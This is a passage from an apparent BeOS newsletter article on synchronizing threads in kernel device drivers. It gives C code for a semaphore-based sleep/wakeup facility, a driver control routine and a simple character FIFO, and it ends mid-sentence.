p.sendBody("direct:quote", "00001.HK") ===> null groovy:000> e.exchanges.last() ===> Exchange[Message: 00001.HK: 90.55 HK$] groovy:000> p.sendBody("direct:quote", "SUNW") ===> null groovy:000> e.exchanges.last() ===> Exchange[Message: SUNW: 123.50 US$] groovy:000> That is it, our simple content-based router successfully routes request to the corresponding processor methods. XML Quote Request, message Transform from("direct://xmlquote").transform().xpath("//quote/@symbol", String.class).to("direct://quote") This next route simply accepts requests in XML, transforms the request and chains it to direct://quote. With this, we've added the capability to accept requests in XML format! We are using XPath here to expression our transform. Check out the hosts of Expression Langauges supported by Camel. Let us try it out: groovy:000> p.sendBody("direct:xmlquote", "<quote symbol='GOOG'/>") ===> null groovy:000> e.exchanges.last() ===> Exchange[Message: GOOG: 123.50 US$] groovy:000> Multi-Channel, Multi-Data-Format Provisioning Grape.grab(group:"org.apache.camel", module:"camel-jetty", version:"2.0.0") Grape.grab(group:"org.apache.camel", module:"camel-freemarker", version:"2.0.0") // ........... lines removed for brevity ............. from('jetty:').transform() .simple('<quote symbol="${header.symbol}"></quote>').to("direct://xmlquote").choice() .when(header("Content-Type").isEqualTo("text/xml")).to("freemarker:xmlquote.ftl") .otherwise().to("freemarker:htmlquote.ftl") .end() Here we use the camel-jetty to expose an endpoint jetty: to our quote service. Note that camel-jetty is not part of camel-core. That is why we have to grab it into our program. The HTTP request is translate into XML using simple expression. Note that the camel-jetty has kindly extracted the request parameters as well as the HTTP header and placed them on the Message header. So the request parameter symbol is access as ${header.symbol} in the expression. Next we simply chain the message exchange to the direct:xmlquote endpoint. The result from direct:xmlquote went thru another translation, which depends on the content-type of the orginating HTTP request. Here, I make use of the camel-freemarker to generate the desire output. So we need to create the two Freemarker templates: htmlquote.ftl<html> <head> </head> <body> <em>${body}</em> </body> </html> xmlquote.ftl<quote-result ${body} </quote-result> So let us see it in action, I'm going to use curl to make HTTP requests. Do this on another command window: [jack@localhost tmp]$ curl <html> <head> </head> <body> <em>IBM: 123.50 US$</em> </body> </html> [jack@localhost tmp]$ curl <html> <head> </head> <body> <em>00001.HK: 90.55 HK$</em> </body> </html> [jack@localhost tmp]$ And to request XML content: [jack@localhost tmp]$ curl -H "Content-Type: text/xml" <quote-result IBM: 123.50 US$ </quote-result> [jack@localhost tmp]$ That's about it for our multi-channel/multi-data-format ser vice provision. Summary In this tutorial, I hoped to illustrate how Camel supports message passing paradigm style of application development. Camel provides all sort of components to help you build processing pipelines. All you need is to implement your business logic as simple POJOs and let Camel handle all the translating, routing, filtering, spliting and forwarding for you. Not shown in this tutorial is how to consume external resources and services from within a route. No sweat, it is just as easy. Camel integrates nicely with Spring as well as Guice, but works nicely on its own. It won't be in your way if you don't need DI support in your application. As they say: Keep the simple easy. Camel works nicely in a JBI environment like ServiceMix and OpenESB. Camel is OSGI-ready and tracks newly deployed bundles for Route definitions at runtime. So you can gear it all to way up to be part of an enterprise SOA infrastructure. Disclaimer, I'm not an experienced Camel user and still learning. Thank you for staying up with me. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/groovy-ride-camel
CC-MAIN-2017-30
refinedweb
1,845
52.15
Not too long ago I had written a few tutorials around navigation in a Vue.js web application. I had written about navigating between routes as well as passing data between routes in the form of route parameters and query parameters. When developing a web application with a successful user interface, you’re going to want to recycle as many features as possible. Using Vue.js, it is possible to create a multiple level UI by assigning child routes to a parent route within the application. This opens the door to new possibilities in navigation. We’re going to see how to use nested routes in a Vue.js web application by assigning child routes and views. While it will be useful to check out my previous navigation article, it won’t be absolutely necessary because we’re going to brush up on a few of the topics. For simplicity, we’re going to start by creating a fresh Vue.js project. Assuming you have the Vue CLI installed, execute the following command: vue init webpack nested-project Answer the questions as prompted by the CLI. It doesn’t matter if you choose to use a standalone project or a runtime-only project. What does matter is that you install the vue-router library. When the project scaffold is created, execute the following commands to finish things off: cd nested-project npm install At this point we can start developing our parent and child routes in preparation for some awesome UI functionality. With a fresh CLI generated project, you should have a src/components/HelloWorld.vue file. We can leave it as is, but to keep the flow of this example, it will be easier to understand if we rename it to src/components/page1.vue. This component is going to represent our parent view. Open the project’s src/components/page1.vue file and include the following: <template> <div class="page1"> <h1>{{ msg }}</h1> <router-view></router-view> </div> </template> <script> export default { name: 'Page1', data () { return { msg: 'Welcome to Your Vue.js App' } } } </script> <style scoped> h1, h2 { font-weight: normal; } a { color: #42b983; } </style> The above code is essentially what we get when scaffolding the project. However, in the <template> block notice that we’ve included <router-view> tags. These tags act as a pass-through for any route that we define. Our child view will pass through these tags. If you open the project’s src/App.vue file, you’ll notice that it also has <router-view> tags. The parent routes pass through these tags in the src/App.vue file. When using <router-view> tags, it is important to note that they cannot be at the root level of the <template> block. In other words, this will not work: <template> <router-view></router-view> </template> Instead, the <router-view> tags must be inside a <div> element or something similar. With the parent view out of the way, let’s focus on the very similar child view that we plan on nesting. Create a src/components/child1.vue file within the project and include the following code: <template> <div class="child1"> <p>{{ footnote }}</p> </div> </template> <script> export default { name: 'Child1', data () { return { footnote: 'Created by The Polyglot Developer' } } } </script> <style scoped></style> The above code will just display a line of text. The goal is to have it display alongside whatever the previous parent view is displaying. With the two components out of the way, let’s focus on wiring the routes together with the vue-router library. All routes for this particular example will be found in the project’s src/router/index.js file. If you open it, you’ll notice it is still referencing the HelloWorld.vue file that we had previously renamed. We’re just going to change up the entire file. Within the project’s src/router/index.js file, include the following: import Vue from 'vue' import Router from 'vue-router' import Page1 from '@/components/page1' import Child1 from '@/components/child1' Vue.use(Router) export default new Router({ routes: [ { path: "/", redirect: { name: "Child1" } }, { path: '/page1', name: 'Page1', component: Page1, children: [ { path: "child1", name: "Child1", component: Child1 } ] } ] }) In the above code you’ll notice that we’re using the redirects that we explored in the previous article. If you run the project, you’ll notice that when you navigate to the root of the application, you’ll be redirected to and both the parent and nested child view data will be rendered tot he screen. Awesome right? This isn’t the only way to accomplish rendering child routes. For example, a default child route could be configured to prevent having to directly navigate to the child path. Take note of the following changes to the src/router/index.js file: import Vue from 'vue' import Router from 'vue-router' import Page1 from '@/components/page1' import Page2 from '@/components/page2' import Child1 from '@/components/child1' Vue.use(Router) export default new Router({ routes: [ { path: "/", redirect: { name: "Child1" } }, { path: '/page1', component: Page1, children: [ { path: "", name: "Child1", component: Child1 } ] } ] }) In the above code we’ve removed the name on the parent route and blanked out the child path attribute. Now, when navigating to the path, the child is rendered. The need to navigate directly to its path is removed. You just saw how to include nested child routes in your Vue.js web application. Having nested children are useful when it comes to templating, among other things. For example, imagine having a settings section of your application where there are multiple settings categories. The settings section could be one of many parent routes while each category could be a child to that parent. If you’re interested in learning more about navigation in a Vue.js application, check out my previous article titled, Use a Router to Navigate Between Pages in a Vue.js Application. If you’d like to know how to pass data between these pages, check out my article titled, Pass Data Between Routes in a Vue.js Web Application.
https://www.thepolyglotdeveloper.com/2017/11/navigate-nested-child-routes-vuejs-web-application/?utm_campaign=Vue.js%20Developers&utm_medium=email&utm_source=Revue%20newsletter
CC-MAIN-2020-24
refinedweb
1,011
63.49
BuildSteps¶ There are a few parent classes that are used as base classes for real buildsteps. This section describes the base classes. The "leaf" classes are described in Build Steps. BuildStep¶ - class buildbot.process.buildstep.BuildStep(name, step acts as a factory for more steps. See Writing BuildStep Constructors for advice on writing subclass constructors. The following methods handle this factory behavior. - addFactoryArguments(..)¶ Add the given keyword arguments to the arguments used to create new step instances; - getStepFactory()¶ Get a factory for new instances of this step. The step can be created by calling the class with the given keyword arguments. attribute. - setBuildSlave(build)¶ Similarly, this method is called with the build slave that will run this step. The default implementation sets the buildslave attribute. -StepStatus(status)¶ This method is called to set the status instance to which the step should report. The default implementation sets step_status. - setupProgress()¶ This method is called during build setup to give the step a chance to set up progress tracking. It is only called if the build has useProgress set. There is rarely any reason to override this method. Exeuction of the step itself is governed by the following methods and attributes. - startStep(remote)¶ Begin the step. This is the build's interface to step execution. Subclasses should override start to implement custom behaviors. The method returns a Deferred that fires when the step finishes. It fires with a tuple of (result, [extra text]), where result is one of the constants from buildbot.status.builder. The extra text is a list of short strings which should be appended to the Build's text results. For example, a test step may add 17 failures to the Build's status by this mechanism. The deferred will errback if the step encounters an exception, including an exception on the slave side (or if the slave goes away altogether). Normal build/test failures will not cause an errback. - start()¶ Begin the step. Subclasses should override this method to do local processing, fire off remote commands, etc. The parent method raises NotImplementedError. Note that this method does not return a Deferred. When the step is done, it should call finished, with a result -- a constant from buildbot.status.results. The result will be handed off to the Build. If the step encounters an exception, it should call failed with a Failure object. This method automatically fails the whole build with an exception. A common idiom is to add failed as an errback on a Deferred: cmd = RemoteCommand(args) d = self.runCommand(cmd) def suceed(_): self.finished(results.SUCCESS) d.addCallback(succeed) d.addErrback(self.failed) If the step decides it does not need to be run, start can return the constant SKIPPED. In this case, it is not necessary to call finished directly. - finished(results)¶ A call to this method indicates that the step is finished and the build should analyze the results and perhaps proceed to the next step. The step should not perform any additional processing after calling this. The parent method handles any pending lock operations, and should be called by implementations in subclasses. - stopped¶ If false, then the step is running. If true, the step is not running, or has been interrupted. This method provides a convenient way to summarize the status of the step for status displays: - constructor. This subclass of BuildStep attribute parameter, and, after setting up an appropriate command, call this method. def start(self): cmd = RemoteShellCommand(..) self.startCommand(cmd, warnings) To refine the status output, override one or more of the following methods. The LoggingBuildStep implementations if it exists, and looks at rc to distinguish SUCCESS from FAILURE. The remaining methods provide an embarassment usally the easiest method to override, and then appends a string describing the step status if it was not successful. Exceptions¶ - exception buildbot.process.buildstep.BuildStepFailed¶ This exception indicates that the buildstep has failed. It is useful as a way to skip all subsequent processing when a step goes wrong. It is handled by BuildStep.failed.
http://docs.buildbot.net/0.8.6p1/developer/cls-buildsteps.html
CC-MAIN-2021-17
refinedweb
670
59.3
Contents 1.4.8 (2011-09-02) rostest: fixed command-line usage documentation #3606 Bug fix for rxgraph stack trace with bad Node bus info #3579 roslaunch: bug fix for using rad and deg with rosparam tags #3580 roslaunch: Fixed bad default value for param in Process.stop() #3582 roslaunch: performance fix for rad and deg with rosparam YAML files #3620 1.4.7 (2011-07-06) - Backwards compatibility for rosbuild2 tags Suppress messages for Inbound connection failures during shutdown #3390 FreeBSD Python 2.7 updates #3519 (Thanks Rene Ladan) rostopic: bug fix for rostopic bw /clock #3543 rosgraph_msgs: adding missing dependency on std_msgs rosbag: remove references to unused zlib #3566 rosrecord: link with filesystem-mt #3564 1.4.6 (2011-05-24) roslisp: WAIT-UNTIL-READY respects deadlines now. roslaunch: "Unable to contact my own XML-RPC server" error message now points at ROS/NetworkSetup. test_ros: bug fix for testSlave.py #3411 (thanks rene) Patch from andrewstraw to handle EINTR in XMLRPC server #3454 1.4.5 (2011-03-01) roswtf: fixed error message/recommendation when ros_comm packages are not built. roscpp: Workaround for log4cxx appender errors being printed to console #3375 1.4.4 (2011-02-24) roscpp: fix for #3300 stop a few warnings roscpp: fix for #3271 Crash on program exit due to destructor ordering and log4cxx patch from mdesnoyer to update unit tests for #3357 rospy: patch from andrewstraw to handle EINTR in tcpros server #3370 1.4.3 (2011-02-21) fixed reporting of roslaunch log file names #3339 patch from timn to add retry logic to requestTopic #3337 rostime, xmlrpcpp: mingw compatibility patches. #3331, #3332 - roscreate-stack: bug fix for unicode handling issues 1.4.2 (2011-02-15) Added printout of ros_comm version when running roscore, backed by Parameter Server for better debugging #3206. Better handling of bad test XML output #2917 1.4.1 (2011-02-13) roscpp Add ros::names::parentNamespace rosdeps for debian:squeeze #3311 rostopic: bug fix for YAML separator in plot output #3291 fixed segfault in log4cxx global destructor #3271 make variable patch for test_rosbag from rene #3328 roswtf: more robust to master comm failure #3250 1.4.0 (2011-01-18) The ros_comm stack was separated from the ros stack after the ROS 1.2.x series. This separation was done as part of the REP 100 work. The main motivation for a separate ros_comm stack is to enable the ROS packaging system to be used separately from the ROS communication system, as well as to decouple their development. Python: ros_comm is now Python 2.6 based. Python 2.5 compatibility has been dropped. - OS X: rosdep dependencies are now Python 2.6 (via Macports). Removed install of deprecated rosrecord/rosplay binaries into ROS_ROOT/bin. - roslib's C++ components split into: rostime: time-related classes (Time, Duration, Rate) cpp_common: macros, debugging tools, types roscpp_traits: message and service traits roscpp_serialization: message serialization Everything that was in the ros namespace remains there, so if you have a dependency on roscpp no changes should be required. Added support for the xmlrpc calls: GetSubscriptions and GetPublications Deprecated defaultMessageCreateFunction in favor of a DefaultMessageCreator functor (#3118, r12091, r12092) ros::ok() will now always be false once a service call returns, if the reason for the call's failure is that the node was shutting down (#3020, r12093) ros::Publisher::publish() now asserts if the message type is not the same as the advertise() type (#2982, r12094) - Fixed message trait functions (not classes) when the message type is constant (r12095) stopic pub -f option for publishing from YAML data. - better handling of piped data on command line. added rostopic list --host option. - Messages moved out of roslib: roslib/Header → std_msgs/Header roslib/Clock → rosgraph_msgs/Clock roslib/Log → rosgraph_msgs/Log rostest: separated out rosunit library and unit-test specific tools. These are now part of lower-level ros stack. --offline option to run static checks only no longer import roslib.msg. Use std_msgs.msg as test instead. - updates for REP 100 changes (ros/ros_comm warnings, roslib checks). roslaunch: added --dump-params option. roslisp: new Python-based message generator genmsg_cpp package has been deleted. Changes since 1.3.4: rostopic: bug fix for use of std_msgs/Header bag.py now detects and warns if the md5sum and message definition don't match new script fix_msg_defs.py tries to repair messages where md5sum and message definition don't match (some of these bags existed due to a bug in rosbag back several generations ago) rosbag fix now has a --force option which will skip messages for which migration rules don't exist. rosbag fix uses raw mode on the bag to preserve md5sums even if message def is bad. This also speeds up performance significantly. - generated roslisp binaries find sbcl on runtime now. This is a fix for generated scripts not working when built as Debian packages.
http://wiki.ros.org/ros_comm/ChangeList/1.4/
CC-MAIN-2014-49
refinedweb
812
54.32
Error #1009: at org.robotlegs.mvcs::Actor/dispatch() I have been banging my head against the wall for about an hour or so, tying to figure out why my service does not seem to get mapped within the framework. I am sure it is something simple I am just overlooking. Here is what I Have within My context: override public function startup():void { var serviceBootsrap:ServiceBootsrap = new ServiceBootsrap(injector); } within My ServiceBootsrap: public function ServiceBootsrap(injector:IInjector) { injector.mapClass(ISlideMenuService, MenuItemListService); } within My MenuItemListService.parseList(): public class MenuItemListService extends Actor implements ISlideMenuService ..... private function parseList():void { for(var i:Number = 0; i < _list.length ; ++i) { //...cool stuff is here. dispatch(new MenuComponentsEvent(MenuComponentsEvent.MENU_ITEM, menuItem)); } I get the Error #1009: at org.robotlegs.mvcs::Actor/dispatch() when it hits the dispatch line in the parseList() method. Comments are currently closed for this discussion. You can start a new one. Keyboard shortcuts Generic Comment Form You can use Command ⌘ instead of Control ^ on Mac Support Staff 1 Posted by Till Schneidere... on 19 Oct, 2011 11:34 AM The only thing that I can come up with from looking at your code is that you might be invoking parseList too early, i.e., before the injections have happened. Are you by any chance invoking it from the constructor instead of from either a [PostConstruct]-annotated method or from the outside after the injector has fully initialized your service? 2 Posted by visnik on 19 Oct, 2011 03:30 PM Till, You are awesome, thank you sir. your question got me to look at the command that injects the service, but i was creating a new service within the execute. As soon as i realized my mistake, commented out the line of code, and boom, all is good. Not sure how I kept missing that yesterday but thanks. I was quite sure is it was something simple I was overlooking. thanks again. Support Staff 3 Posted by Till Schneidere... on 19 Oct, 2011 03:32 PM Cool, very glad my question helped you get things sorted!
http://robotlegs.tenderapp.com/discussions/problems/403-error-1009-at-orgrobotlegsmvcsactordispatch
CC-MAIN-2019-13
refinedweb
344
57.57
<tweet gone missing> Webpack 2.2 has reached release candidate 4, the last pre-release version. Time to update! My motivation was "Ugh, I'm tired of these 3min+ local compile times. The amount of waiting is too damn high!" The new features are a nice bonus too. After many days of fiddling, my Webpack is ready. Production compiles take 219 seconds instead of 226, and local dev compilation takes 152 seconds instead of 151. It’s not that worth it, but incremental compiles with Webpack in watch mode feel smooth as silk. I love the new feature that highlights big files and tells you initial load sizes for different apps. I’ve been using it to eyeball different options, and I'm sure it has bigger use cases, too. Fine-tuning code splitting perhaps? Then again, rc4 just disabled these features by default "because they're annoying". I liked it. Webpack recommends keeping files under 250kB, which sounds like a lot, but it looks damn small compared to my code. Did you know 196kB of source ES6 compiles into about 920kB of browser-ready JavaScript? With minification, tree shaking, and dead code elimination! Without that, it's 2.3 megs. ? The day when we ship raw ES6 code can't come soon enough. BTW: Tree shaking removes unused dependencies (like when you import a whole library but just use a function or two), and dead code elimination removes code that's unreachable, like functions you never call. So is upgrading to Webpack 2 even worth it? Totally. Once they and the ecosystem resolve some issues, tree shaking will ride eternal, shiny and chrome. Here are some gotchas I discovered while upgrading. It's not quiiiiite ready yet (dependency hellish) You can use Webpack 2 in production. I'm about to start. Although now that they’ve promised to release the final version in < 10 days, I might wait. Or gently delay the code review and QA process until their release. We'll see :) But here's one thing that's really awkward right now. When you upgrade to Webpack 2.2.rc.x, you fall into a small dependency hell with extract-text-webpack-plugin. The released version depends on Webpack 2.1, which is silly. If you're going bleeding edge, you might as well go all the way, ya know? So here's what you have to do: // packages.json"dependencies": {//..."extract-text-webpack-plugin": "git://github.com/webpack/extract-text-webpack-plugin#cbd4690","webpack": "^2.2.0-rc.3" I'd show you the npm install command, but I don't know how to point at specific commits. See that #cbd4690 hash? That's the exact commit that says Add webpack 2 RC compatibility. This is fragile and a terrible idea. You will forget to update this dependency in the future, and it will continue to point at a random commit for the foreseeable future. Happens every time. But the published version on npm doesn't work. ? I assume they'll fix it for final release. Why extract-text-webpack-plugin? It makes stylesheet imports better, I'm told. It. See? Useful. You also have to update babel-loader to at least 6.2.10. That's when they added support for Webpack 2 rc. Not too bad. Funny config updates, but better docs The new Webpack 2 docs are so much better. Check out this wonderful Migrating from v1 to v2 official guide. You basically have to do a find & replace, and you're done. Just don't forget to take '' out of resolve.extensions. I don't remember why everyone needed that in the past, but I know that the new Webpack throws an error. Error reports for bad configuration are also better now. That was fun to see. Loved it. CSS/Less and PostCSS plugin If you're not using Webpack to load CSS and compile Less or Sass, you should. It's made my life a lot easier. Especially the PostCSS plugin makes your CSS easier to write. Going from Webpack v1 to Webpack v2 involved many changes in this config. We used to have this: // webpack.config.jsloaders: [// ...{test: /\.(less|css)$/,loader: ExtractTextPlugin.extract("style/useable", "css?sourceMap!postcss-loader!less-loader?sourceMap=true"),include: [path.resolve(__dirname, "app/assets/stylesheets")]},{test: /\.css$/,loader: ExtractTextPlugin.extract("style/useable", "css?sourceMap!postcss-loader?sourceMap=true")},// ...],postcss: function () {return [precss,// UglifyJSPlugin mangles valid css during minfication. It is a known issue and this fix was obtained from:({ addDependencyTo: webpack }),postcssURL(),postcssNext({browsers: ['last 2 versions', 'ie >= 9'],compress: true}),cssnano({zindex: false})// end UglifyJSPlugin fix];} Which is probably too much config, but it worked. With Webpack v2 that's become more manageable and looks like this: // webpack.config.jsmodule: {rules: [{test: /\.(less|css)$/,use: [ExtractTextPlugin.extract({fallbackLoader: "style/useable",loader: "style-loader"}),{loader: 'css-loader?sourceMap',query: {modules: true,importLoaders: 2}},'postcss-loader?sourceMap','less-loader?sourceMap']},]}, So much less code ? That's because a lot of it is now in a different file called postcss.config.js. That one is a copypaste of the detailed config for postcss itself: const webpack = require("webpack");module.exports = {plugins: [// UglifyJSPlugin mangles valid css during minfication. It is a known issue and this fix was obtained from:("postcss-import")({ addDependencyTo: webpack }),require("postcss-url"),require("postcss-cssnext")({browsers: ["last 2 versions", "ie >= 9"],compress: true,}),require("cssnano")({ zindex: false }),// end UglifyJSPlugin fix],}; I don't know if the UglifyJS bug we're working around still exists, so I left the config as I found it. Just to be safe. Looking at code blobs is hard, so here's what happened: - Webpack 2 no longer allows plugin-specific config keys like postcss. Everything must fit in the rules.uselisting. - PostCSS now uses a separate config file called postcss.config.js. This works out of the box. - I removed separate rules for compiled and uncompiled CSS. - Everything goes in the rules.usearray. - Use rules evaluate last to first. - First, we use less-loaderto compile Less to CSS. - Then, we use postcss-loaderto do the PostCSS changes. - Then, css-loaderenables import css from 'file.css'. - Finally, ExtractTextPluginputs it in <style>. All of this used to be encoded in the loader bang syntax before: css?sourceMap!postcss-loader!less-loader?sourceMap=true Whomever came up with the use: [] syntax, you're the best. I love the new approach. Tree shaking and optimization Now for the reason we're all here: tree shaking. Webpack 2 understands native ES6 imports and uses them as split points. That means it can organize your code into different chunks so you're only loading the JavaScript that you're using. What it also means is that it understands when you're importing more than you need. Combined with the UglifyJsPlugin, it can eliminate that extra code. I spent a lot of time looking for what exactly turns this feature on. Turns Out™, it's on by default. Just Works™. Here's what you have to do: - Tell Babel not to compile imports into CommonJS (require stuff) - Enable UglifyJS // webpack.config.jsrules: [{test: /\.js$/,include: [path.resolve(__dirname, "app/assets/javascripts")],exclude: [path.resolve(__dirname, "node_modules/")],query: {plugins: ["transform-decorators-legacy","transform-runtime","transform-object-rest-spread","transform-react-constant-elements","transform-class-properties",],presets: [["es2015", { modules: false }], "latest", "react"],},loader: "babel-loader",},];// ...plugins: [new webpack.optimize.UglifyJsPlugin({compress: {warnings: false,screw_ie8: true,conditionals: true,unused: true,comparisons: true,sequences: true,dead_code: true,evaluate: true,join_vars: true,if_return: true,},output: {comments: false,},}),]; See that {modules: false} in the babel-loader config? That's new. You can specify options when defining Babel plugins and presets. modules: false tells the es2015 preset to avoid compiling import statements into CommonJS. That lets Webpack do tree shaking on your code. UglifyJsPlugin without extra config will do what we need, but I wanted to show you the options. It's unused and dead_code that enable tree shaking. However, we have to wait for the ecosystem to catch up. Most libraries are distributed with ES6 modules compiled to ES5, so in a real world scenario, you only get about 4% improvement. ? With Webpack 2 around the corner, this is sure to improve. Can't wait! You should also split your code into Your Code and Everybody Else's code. Webpack docs have a great guide on Code Splitting for Libraries. Happy hacking ?️
https://swizec.com/blog/migrating-to-webpack-2-some-tips-and-gotchas/
CC-MAIN-2021-43
refinedweb
1,400
60.11
Yes i am asking for multiple Strings in a single variable how can i do this? Yes i am asking for multiple Strings in a single variable how can i do this? Making a new class of the append file code and how can i input multile variables in string? Exacltly i would like to arrange this code in my programme but problem is this that where should i put this code to append the file. I would like to implement this code in my programme to append the file like in this code appending the file is work properly but how can i arrange this code in my programme code as above mention in... Dear Norm. Yes i did it but where I have to implement this code in my programme and the code is written below... package org.kodejava.example.io; import java.io.*; Dear Norm. There is no error but the text file is not appending. I want to append the same file on each and every click button. Hi guys, I am stuck badly as I am using java.nio the new java Input Output file system packages. I just wanted to implement simple coding that will append my text file. Below is the code, ...
http://www.javaprogrammingforums.com/search.php?s=0d94e8c501bf0eb0ff728fc666d03f93&searchid=1027632
CC-MAIN-2014-35
refinedweb
209
80.92
Mercurial > dropbear view libtommath/bn_mp_cnt_lsb.c @ 457:e430a26064ee DROPBEAR_0.50 Make dropbearkey only generate 1024 bit keys line source #include <tommath.h> #ifdef BN_MP_CNT_LSB int lnz[16] = { 4, 0, 1, 0, 2, 0, 1, 0, 3, 0, 1, 0, 2, 0, 1, 0 }; /* Counts the number of lsbs which are zero before the first zero bit */ int mp_cnt_lsb(mp_int *a) { int x; mp_digit q, qq; /* easy out */ if (mp_iszero(a) == 1) { return 0; } /* scan lower digits until non-zero */ for (x = 0; x < a->used && a->dp[x] == 0; x++); q = a->dp[x]; x *= DIGIT_BIT; /* now scan this digit until a 1 is found */ if ((q & 1) == 0) { do { qq = q & 15; x += lnz[qq]; q >>= 4; } while (qq == 0); } return x; } #endif /* $Source: /cvs/libtom/libtommath/bn_mp_cnt_lsb.c,v $ */ /* $Revision: 1.3 $ */ /* $Date: 2006/03/31 14:18:44 $ */
https://hg.ucc.asn.au/dropbear/file/e430a26064ee/libtommath/bn_mp_cnt_lsb.c
CC-MAIN-2022-40
refinedweb
141
60.35
static class variables and module scope Discussion in 'Python' started by The Dark Seraph, Jul 19, 2004. - Similar Threads IMPORT STATIC; Why is "import static" file scope? Why not class scope?Paul Opal, Oct 9, 2004, in forum: Java - Replies: - 12 - Views: - 1,196 - Paul Opal - Oct 11, 2004 Instantiating a static class( Class with all static members - methods and variables)SaravanaKumar, Oct 18, 2004, in forum: Java - Replies: - 6 - Views: - 9,872 - Tony Morris - Oct 19, 2004 How do namespace scope and class scope differ?Steven T. Hatton, Jul 18, 2005, in forum: C++ - Replies: - 9 - Views: - 685 - Kev - Jul 19, 2005 Scope of static class variablesChristoph, Apr 3, 2007, in forum: Java - Replies: - 16 - Views: - 692 - Chris Uppal - Apr 5, 2007 Thread safety problems with function scope static variables vs class static private membersHicham Mouline, Dec 18, 2008, in forum: C++ - Replies: - 5 - Views: - 2,707 - James Kanze - Dec 19, 2008
http://www.thecodingforums.com/threads/static-class-variables-and-module-scope.333357/
CC-MAIN-2016-18
refinedweb
153
67.01
This article continues the exploration of process synchronization in BeOS device drivers. You may want to review the first article, "Synchronization in Device Drivers," from three months ago. That article concluded with an example of the "z" facility which coordinates multiple "producers" and "consumers." This method yields a "broadcast" form of synchronization, where each thread examines the shared data, determining whether to proceed. As an exercise for readers, I did not show the version which uses just one semaphore. One reader, Oleg, deserves honorable mention for e-mailing the correct code. My single-semaphore version follows. It assumes greater responsibility, being able to both coordinate threads and to lock data structures. In the previous article, locking was achieved through the lock()/ unlock() calls. struct wchan{ sem_id xsem, wsem; uint nthread; }; void wacquire( struct wchan * w) { static spinlock sl; cpu_status ps= disable_interrupts( ); acquire_spinlock( & sl); if ( w-> xsem== 0) { w-> xsem= create_sem( 1, "excluded"); w-> wsem= create_sem( 0, "waiting"); } release_spinlock( & sl); restore_interrupts( ps); acquire_sem( w-> xsem); } void wrelease( struct wchan * w) { release_sem( w-> xsem); } void wsleep( struct wchan * w) { ++ w-> nthread; release_sem( w-> xsem); acquire_sem( w-> wsem); acquire_sem( w-> xsem); } void wakeup( struct wchan * w) { if ( w-> nthread) { release_sem_etc( w-> wsem, w-> nthread, 0); w-> nthread= 0; } } A wchan struct is allocated (statically) to protect a set of data, around which multi-threaded activities occur. An example is driver data for a serial port. N serial ports would require N wchan structs. The general idea is to acquire exclusive use of the data when you enter the driver, and relinquish it when you leave; the relevant calls are wacquire() and wrelease(). Within the driver, you may block for any reason, by calling wsleep(), whereupon you temporarily lose control of the data. After unblocking, you automatically have control of the data, but it may have changed while you were "asleep." How were you woken up? By another thread in the driver, who called wacquire() and then wakeup(). To simplify the discussion, this article is ignoring hardware interrupts entirely. Therefore, all flows-of- control are assumed to be background threads and, of course, in the kernel. As most hardware is operated with interrupts, this code would need augmentation before such use. See the previous article for details. Here is the standard BeOS "control" entry-point for our hypothetical driver. It demonstrates the use of the "wchan" facility. Since there are no interrupts, all data producer and consumer threads must call this function. PUT_DATA is a producer command, while GET_LINE and FLUSH_ON_NULL are consumer commands. WAIT_FOR_MORE and WAIT_UNTIL_EMPTY consume nothing, but merely synchronize on some condition. struct device{ struct wchan w; struct clist clist; }; status_t dev_control( void * v, uint32 com, void * buf, size_t len) { status_t s; wacquire( & dp-> w); s= control( v, com, buf, len); wrelease( & dp-> w); return ( s); } static status_t control( void * v, uint32 com, void * buf, size_t len) { struct device * dp; size_t i; dp= (struct device *) v; switch ( com) { case GET_LINE: while ( findchar( & dp-> clist, '\n') == 0) if ( wsleep( & dp-> w) == 0) return ( B_INTERRUPTED); for ( i=0; i<len; ++ i) { int c= getc( & dp-> w, & dp-> clist); if ( c< 0) return ( B_INTERRUPTED); ((char *) buf)[ i] = c; if ( c== '\n') break; } break; case FLUSH_ON_NULL: while ( findchar( & dp-> clist, 0) == 0) if ( wsleep( & dp-> w) == 0) return ( B_INTERRUPTED); while ( dp-> clist. nchar) if ( getc( & dp-> w, & dp-> clist) < 0) return ( B_INTERRUPTED); break; case WAIT_FOR_MORE: i= dp-> clist. nchar; while ( dp-> clist. nchar== i) if ( wsleep( & dp-> w) == 0) return ( B_INTERRUPTED); break; case WAIT_UNTIL_EMPTY: while ( dp-> clist. nchar) if ( wsleep( & dp-> w) == 0) return ( B_INTERRUPTED); break; case PUT_DATA: for ( i=0; i< len; ++ i) if ( putc( & dp-> w, & dp-> clist, ((uchar *) buf)[ i]) < 0) return ( B_INTERRUPTED); } return ( B_OK); } The purpose of the driver is to pass data between user-level threads. Data is buffered with byte-wide FIFOs, using the putc() and getc() calls. As a convenience, these will block when there is no data to get, or too much data already buffered. Note the call to wakeup() whenever the FIFO changes: This serves all threads in the driver, not just those sleeping in the clist module. struct cdata { struct cdata * next; uchar c; }; struct clist { struct cdata * head, * tail; uint nchar; }; putc( struct wchan * w, struct clist * cl, int c) { struct cdata * d; while ( cl-> nchar>= CLISTMAX) if ( wsleep( w) == 0) return (-1); d= (struct cdata *) malloc( sizeof * d); d-> c= c; d-> next= 0; if ( cl-> head) cl-> tail-> d; else cl-> head= d; cl-> tail= d; ++ cl-> nchar; wakeup( w); return ( c); } getc( struct wchan * w, struct clist * cl) { struct cdata * h; int c; while ( cl-> nchar== 0) if ( wsleep( w) == 0) return (-1); h= cl-> head; c= h-> c; cl-> head= h-> free( h); wakeup( w); return ( c); } bool findchar( struct clist * cl, uint c) { struct cdata * d; for ( d= cl-> head; d; d= d-> next) if ( d-> c== c) return ( TRUE); return ( FALSE); } Devising a more conservative protocol for wakeup() calls in the clist module would greatly improve efficiency. A larger blocking factor for malloc() would also help! The attentive reader might have noticed that wsleep() is defined as returning void, but is used as if it returns bool. This leads us to a key topic: The failure to acquire semaphores. The call acquire_sem() blocks until it succeeds; this is rarely the desired behavior for device drivers. The user may wish to abort an operation which is lagging or hung. Programs may want to timeout automatically, and retry. This is all possible with the acquire_sem_etc() call. When a timeout occurs, or the thread is sent a signal, the call returns without having acquired the semaphore. The driver must respond, usually by returning an immediate error. I must admit failure myself, in being unable to work this into the above implementation of "wchan." Readers are welcome to respond. Therefore, I must return to a BYOB (bring your own blockable) approach, as in the first article. To recap, each thread that wants to block until "something happens" will call wsleep(). A semaphore is created on the spot, and added atomically to the list of waiting threads. Later, a different thread will call wakeup(), with the usual broadcast effect. The return from wsleep() 